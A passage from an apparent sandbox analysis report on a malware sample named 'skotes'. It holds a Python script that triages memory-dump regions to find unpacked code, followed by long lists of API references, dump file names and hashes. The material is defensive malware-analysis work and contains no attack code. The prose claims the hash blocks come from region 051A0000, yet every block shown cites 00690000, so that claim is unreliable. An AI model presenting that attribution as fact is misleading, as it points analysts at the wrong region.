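and `type` carrying the Windows MEMORY_BASIC_INFORMATION values from winnt.h.
Fields 6 and 8 are not interpreted.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Page protection constants (winnt.h); only the low byte is the base protection.
PAGE_READWRITE         = 0x04
PAGE_WRITECOPY         = 0x08
PAGE_EXECUTE           = 0x10
PAGE_EXECUTE_READ      = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
WRITABLE   = {PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

# Region type constants (winnt.h).
MEM_PRIVATE = 0x20000
MEM_MAPPED  = 0x40000
MEM_IMAGE   = 0x1000000
TYPE_NAMES  = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

# Constructed input: the two descriptor lines as they appear in this report.
SAMPLE_LINES = [
    "• Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false",
    "• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true",
]


@dataclass
class DumpRegion:
    pid: int
    stage: int
    base: int
    protect: int
    mem_type: int
    based_on_pe: bool
    name: str

    @property
    def executable(self) -> bool:
        return (self.protect & 0xFF) in EXECUTABLE

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in WRITABLE


def parse_source_line(line: str) -> Optional[DumpRegion]:
    """Parse one 'Source File: ... based on PE: ...' line; None if it does not match."""
    m = SOURCE_RE.search(line)
    if not m:
        return None
    fields = m.group("name")[: -len(".sdmp")].split(".")
    if len(fields) != 8:          # assumed layout (see module docstring)
        return None
    return DumpRegion(
        pid=int(fields[0], 10),
        stage=int(fields[1], 10),
        base=int(fields[3], 16),
        protect=int(fields[4], 16),
        mem_type=int(fields[6], 16),
        based_on_pe=(m.group("pe") == "true"),
        name=m.group("name"),
    )


def classify(r: DumpRegion) -> str:
    """Label a dump region for analyst triage."""
    if r.mem_type == MEM_IMAGE:
        return "image-backed"
    if r.executable and r.writable and r.mem_type == MEM_PRIVATE and not r.based_on_pe:
        # RWX private memory with no PE header: typical of a manually mapped
        # or decrypted stage, i.e. the place to start carving/rebuilding.
        return "unpacked-code-candidate"
    return "other"


def triage(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (dump name, label) for every parseable descriptor line."""
    out = []
    for line in lines:
        r = parse_source_line(line)
        if r is not None:
            out.append((r.name, classify(r)))
    return out


if __name__ == "__main__":
    for name, label in triage(SAMPLE_LINES):
        r = parse_source_line("Source File: %s, Offset: 0, based on PE: false" % name)
        print("%-12s pid=%d base=0x%08X protect=0x%02X type=%s -> %s" % (
            "", r.pid, r.base, r.protect, TYPE_NAMES.get(r.mem_type, hex(r.mem_type)), label))
```

The region at 051A0000 is the one to rebuild first: every hash block above was extracted from it, and the PE-backed module at 00690000 is only the host image. Because the sandbox's own field semantics are assumed here, confirm the decoding against a dump whose protection you already know before relying on the labels.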
APIs
• Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006B0F16
• Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006B0F62
  • Part of subcall function 006B265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 006B2750
• Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 006B0FCE
• Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006B0FEA
• Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006B103E
• Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006B106B
• Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 006B10C1
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
• String ID: (
• API String ID: 2943730970-3887548279
• Opcode ID: eea3053fcd5dc65a5d5d283ba0891f83629c7468b9757b9bd35fd8cbd170a0df
• Instruction ID: 50a979f11f0413a4db4c40a8ff6cb0cb438c61f082b3eb4f38be66b4db2aa4dc
• Opcode Fuzzy Hash: eea3053fcd5dc65a5d5d283ba0891f83629c7468b9757b9bd35fd8cbd170a0df
• Instruction Fuzzy Hash: AFB15DB0A00615EFDB28DF58D9A1ABABBB6FF45300F14416DE906AB351D730ED81CB94
APIs
  • Part of subcall function 006B2CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 006B2D0F
• Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 006B1614
  • Part of subcall function 006B2E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 006B2E39
  • Part of subcall function 006B2E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 006B2EA8
• Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 006B1746
• Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 006B17A6
• Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 006B17B2
• Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 006B17ED
• Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 006B180E
• Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 006B181A
• Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 006B1823
• Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 006B183B
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
• String ID:
• API String ID: 2508902052-0
• Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
• Instruction ID: 25b749f851ad6ec8d6a2671d307a113e3cfd3b840da21c0434cb0e25a7957147
• Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
• Instruction Fuzzy Hash: B3816CB1E00225AFCB18CFA8C5A49ADB7F6FF49304B5546ADD445AB701DB30AD92CB84
APIs
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 006BEC81
  • Part of subcall function 006B8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 006B8F50
• Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 006BECE7
• Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 006BECFF
• Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 006BED0C
  • Part of subcall function 006BE7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 006BE7D7
  • Part of subcall function 006BE7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 006BE86F
  • Part of subcall function 006BE7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 006BE879
  • Part of subcall function 006BE7AF: Concurrency::location::_Assign.LIBCMT ref: 006BE8AD
  • Part of subcall function 006BE7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 006BE8B5
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
• String ID:
• API String ID: 2363638799-0
• Opcode ID: 12688f080c1419357179f3c24e0f9c84fbca6a77635c08f7075a508ec323fbbd
• Instruction ID: cbbbc067f54c73dfce4af065cf73ea0214bef36efc0224777d112cddd652722d
• Opcode Fuzzy Hash: 12688f080c1419357179f3c24e0f9c84fbca6a77635c08f7075a508ec323fbbd
• Instruction Fuzzy Hash: B3518271A002059FDF64EF50C895BEDB777EF44310F154069EA066B392CBB1AE85CB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtFlushProcessWriteBuffers.NTDLL ref: 006ACBAA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: BuffersFlushProcessWrite
• String ID:
• API String ID: 2982998374-0
• Opcode ID: 8a77446d4aff7855fe24c0c0b20fa891e27ff79bb16d2916a40982e21092d9ee
• Instruction ID: 6fe212656da5b33f42ef12b3419110b3d56ced3fcbb60b3a57ffad6fd21a7e2e
• Opcode Fuzzy Hash: 8a77446d4aff7855fe24c0c0b20fa891e27ff79bb16d2916a40982e21092d9ee
• Instruction Fuzzy Hash: 12B09232A139304BCB512B14BC885AD77569B81A2130B2156DA02AB234CA515E828FE8
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 50f3beea9463300879075a12e2704b9e5a12231e10279031c169ff7b1ec0675a
                                                                                                                                                                                                                                          • Instruction ID: 8a84c34701b4249f8db1286551eb94b680ff793ad4edfa92746ab21623fe40ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50f3beea9463300879075a12e2704b9e5a12231e10279031c169ff7b1ec0675a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36519CB2A0160A8FDB15DF58D8957AEB7F2FB58304F24856AD406EB790D374AD40CF90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006AF2BB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
